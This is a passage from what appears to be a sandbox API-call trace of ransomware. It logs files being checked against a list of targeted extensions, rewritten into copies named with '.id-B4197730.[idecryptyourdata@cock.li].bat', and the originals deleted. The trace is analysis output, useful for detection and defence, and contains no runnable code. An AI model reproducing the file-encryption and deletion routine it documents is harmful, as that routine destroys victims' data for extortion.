(lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0048.172] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc64 | out: lpNewFilePointer=0x0) returned 1 [0048.173] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc24 | out: lpNewFilePointer=0x0) returned 1 [0048.173] ReadFile (in: hFile=0x328, lpBuffer=0x3e08058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x30cfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e08058*, lpNumberOfBytesRead=0x30cfc30*=0x40000, lpOverlapped=0x0) returned 1 [0049.470] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc24 | out: lpNewFilePointer=0x0) returned 1 [0049.470] ReadFile (in: hFile=0x328, lpBuffer=0x3e48058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x30cfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e48058*, lpNumberOfBytesRead=0x30cfc30*=0x40000, lpOverlapped=0x0) returned 1 [0051.896] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x30cfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.896] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc24 | out: lpNewFilePointer=0x0) returned 1 [0051.896] ReadFile (in: hFile=0x328, lpBuffer=0x3e88058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x30cfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e88058*, lpNumberOfBytesRead=0x30cfc30*=0x40000, lpOverlapped=0x0) returned 1 [0055.258] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0055.258] WriteFile (in: hFile=0x328, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xc0110, lpNumberOfBytesWritten=0x30cfca8, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfca8*=0xc0110, lpOverlapped=0x0) returned 1 [0055.812] SetEndOfFile (hFile=0x328) returned 1 [0055.812] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x4291078 [0055.815] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc74 | out: lpNewFilePointer=0x0) returned 1 [0055.815] WriteFile (in: hFile=0x328, lpBuffer=0x4291078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x30cfc80, lpOverlapped=0x0 | out: lpBuffer=0x4291078*, lpNumberOfBytesWritten=0x30cfc80*=0x40000, lpOverlapped=0x0) returned 1 [0055.816] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc74 | out: lpNewFilePointer=0x0) returned 1 [0055.816] WriteFile (in: hFile=0x328, lpBuffer=0x4291078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x30cfc80, lpOverlapped=0x0 | out: lpBuffer=0x4291078*, lpNumberOfBytesWritten=0x30cfc80*=0x40000, lpOverlapped=0x0) returned 1 [0055.819] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x30cfc74 | out: lpNewFilePointer=0x0) returned 1 [0055.819] WriteFile (in: hFile=0x328, lpBuffer=0x4291078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x30cfc80, lpOverlapped=0x0 | out: lpBuffer=0x4291078*, lpNumberOfBytesWritten=0x30cfc80*=0x40000, lpOverlapped=0x0) returned 1 [0055.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0055.824] CloseHandle (hObject=0x328) returned 1 [0056.440] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString=".doc") returned 4 [0056.441] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.441] lstrlenW (lpString=".docx") returned 5 [0056.441] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0056.441] lstrlenW (lpString=".pdf") returned 4 [0056.441] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.441] lstrlenW (lpString=".xls") returned 4 [0056.441] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.441] lstrlenW (lpString=".xlsx") returned 5 [0056.441] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0056.441] lstrlenW (lpString=".ppt") returned 4 [0056.441] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString=".zip") returned 4 [0056.441] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.441] lstrlenW (lpString=".rar") returned 4 [0056.441] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.441] lstrlenW (lpString=".bz2") returned 4 [0056.441] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.441] lstrlenW (lpString=".7z") returned 3 [0056.441] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString=".dbf") returned 4 [0056.441] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString=".1cd") returned 4 [0056.441] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString=".jpg") returned 4 [0056.441] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.441] lstrlenW (lpString=".doc") returned 4 [0056.442] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.442] lstrlenW (lpString=".docx") returned 5 [0056.442] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0056.442] lstrlenW (lpString=".pdf") returned 4 [0056.442] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.442] lstrlenW (lpString=".xls") returned 4 [0056.442] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.442] lstrlenW (lpString=".xlsx") returned 5 [0056.442] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0056.442] lstrlenW (lpString=".ppt") returned 4 [0056.442] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.442] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.442] lstrlenW (lpString=".zip") returned 4 [0056.442] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.442] lstrlenW (lpString=".rar") returned 4 [0056.442] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.442] lstrlenW (lpString=".bz2") returned 4 [0056.442] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.442] lstrlenW (lpString=".7z") returned 3 [0056.442] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.442] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.442] lstrlenW (lpString=".dbf") returned 4 [0056.442] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.442] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.442] lstrlenW (lpString=".1cd") returned 4 [0056.442] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.442] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0056.442] lstrlenW (lpString=".jpg") returned 4 [0056.442] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.442] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0056.442] lstrlenW (lpString="Setup.exe") returned 9 [0056.443] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.443] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=78152) returned 1 [0056.443] CloseHandle (hObject=0x328) returned 1 [0056.443] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 0x80 [0056.443] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.443] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.443] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.443] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.443] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0056.444] GetLastError () returned 0x0 [0056.444] ReadFile (in: hFile=0x328, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x13148, lpOverlapped=0x0) returned 1 [0056.446] WriteFile (in: hFile=0x334, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x13150, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x13150, lpOverlapped=0x0) returned 1 [0056.448] ReadFile (in: hFile=0x328, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0056.448] WriteFile (in: hFile=0x334, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xe6, lpOverlapped=0x0) returned 1 [0056.448] SetEndOfFile (hFile=0x334) returned 1 [0056.449] CloseHandle (hObject=0x334) returned 1 [0056.451] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.451] SetEndOfFile (hFile=0x328) returned 1 [0056.452] CloseHandle (hObject=0x328) returned 1 [0056.452] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0056.452] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 1 [0056.452] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.452] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.452] lstrlenW (lpString=".doc") returned 4 [0056.452] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0056.452] lstrlenW (lpString=".docx") returned 5 [0056.452] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0056.452] lstrlenW (lpString=".pdf") returned 4 [0056.453] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0056.453] lstrlenW (lpString=".xls") returned 4 [0056.453] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0056.453] lstrlenW (lpString=".xlsx") returned 5 [0056.453] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0056.453] lstrlenW (lpString=".ppt") returned 4 [0056.453] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0056.453] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.453] lstrlenW (lpString=".zip") returned 4 [0056.453] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0056.453] lstrlenW (lpString=".rar") returned 4 [0056.453] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0056.453] lstrlenW (lpString=".bz2") returned 4 [0056.453] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0056.453] lstrlenW (lpString=".7z") returned 3 [0056.453] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0056.453] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.453] lstrlenW (lpString=".dbf") returned 4 [0056.453] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0056.453] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.453] lstrlenW (lpString=".1cd") returned 4 [0056.453] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0056.453] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.453] lstrlenW (lpString=".jpg") returned 4 [0056.453] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0056.453] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.453] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.453] lstrlenW (lpString=".doc") returned 4 [0056.453] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0056.453] lstrlenW (lpString=".docx") returned 5 [0056.453] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0056.453] lstrlenW (lpString=".pdf") returned 4 [0056.454] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0056.454] lstrlenW (lpString=".xls") returned 4 [0056.454] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0056.454] lstrlenW (lpString=".xlsx") returned 5 [0056.454] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0056.454] lstrlenW (lpString=".ppt") returned 4 [0056.454] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0056.454] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.454] lstrlenW (lpString=".zip") returned 4 [0056.454] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0056.454] lstrlenW (lpString=".rar") returned 4 [0056.454] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0056.454] lstrlenW (lpString=".bz2") returned 4 [0056.454] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0056.454] lstrlenW (lpString=".7z") returned 3 [0056.454] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0056.454] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.454] lstrlenW (lpString=".dbf") returned 4 [0056.454] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0056.454] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.454] lstrlenW (lpString=".1cd") returned 4 [0056.454] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0056.454] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0056.454] lstrlenW (lpString=".jpg") returned 4 [0056.454] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0056.454] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0056.454] lstrlenW (lpString="SetupEngine.dll") returned 15 [0056.454] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.455] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=807256) returned 1 [0056.455] CloseHandle (hObject=0x328) returned 1 [0056.455] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 0x80 [0056.455] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.455] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.455] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.455] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.455] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0056.455] GetLastError () returned 0x0 [0056.455] ReadFile (in: hFile=0x328, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0xc5158, lpOverlapped=0x0) returned 1 [0056.469] WriteFile (in: hFile=0x334, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xc5160, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xc5160, lpOverlapped=0x0) returned 1 [0056.482] ReadFile (in: hFile=0x328, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0056.483] WriteFile (in: hFile=0x334, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf2, lpOverlapped=0x0) returned 1 [0056.483] SetEndOfFile (hFile=0x334) returned 1 [0056.483] CloseHandle (hObject=0x334) returned 1 [0056.923] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.923] SetEndOfFile (hFile=0x328) returned 1 [0057.037] CloseHandle (hObject=0x328) returned 1 [0057.037] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0057.037] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 1 [0057.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.038] lstrlenW (lpString=".doc") returned 4 [0057.038] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.038] lstrlenW (lpString=".docx") returned 5 [0057.038] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0057.038] lstrlenW (lpString=".pdf") returned 4 [0057.038] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.038] lstrlenW (lpString=".xls") returned 4 [0057.038] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.038] lstrlenW (lpString=".xlsx") returned 5 [0057.038] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0057.038] lstrlenW (lpString=".ppt") returned 4 [0057.038] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.038] lstrlenW (lpString=".zip") returned 4 [0057.038] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.038] lstrlenW (lpString=".rar") returned 4 [0057.038] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.038] lstrlenW (lpString=".bz2") returned 4 [0057.038] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.038] lstrlenW (lpString=".7z") returned 3 [0057.038] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.039] lstrlenW (lpString=".dbf") returned 4 [0057.039] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.039] lstrlenW (lpString=".1cd") returned 4 [0057.039] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.039] lstrlenW (lpString=".jpg") returned 4 [0057.039] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.039] lstrlenW (lpString=".doc") returned 4 [0057.039] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString=".docx") returned 5 [0057.039] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0057.039] lstrlenW (lpString=".pdf") returned 4 [0057.039] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString=".xls") returned 4 [0057.039] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString=".xlsx") returned 5 [0057.039] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0057.039] lstrlenW (lpString=".ppt") returned 4 [0057.039] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.039] lstrlenW (lpString=".zip") returned 4 [0057.039] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString=".rar") returned 4 [0057.039] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.039] lstrlenW (lpString=".bz2") returned 4 [0057.039] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.039] lstrlenW (lpString=".7z") returned 3 [0057.040] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.050] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.050] lstrlenW (lpString=".dbf") returned 4 [0057.051] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.051] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.052] lstrlenW (lpString=".1cd") returned 4 [0057.052] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0057.112] lstrlenW (lpString=".jpg") returned 4 [0057.112] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.112] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0057.112] lstrlenW (lpString="sqmapi.dll") returned 10 [0057.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0057.112] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=144416) returned 1 [0057.113] CloseHandle (hObject=0x34c) returned 1 [0057.113] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 0x80 [0057.113] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.113] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0057.113] SetFilePointerEx (in: hFile=0x34c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.113] SetFilePointerEx (in: hFile=0x34c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.114] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0057.114] GetLastError () returned 0x0 [0057.114] ReadFile (in: hFile=0x34c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x23420, lpOverlapped=0x0) returned 1 [0057.118] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x23430, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x23430, lpOverlapped=0x0) returned 1 [0057.121] ReadFile (in: hFile=0x34c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, 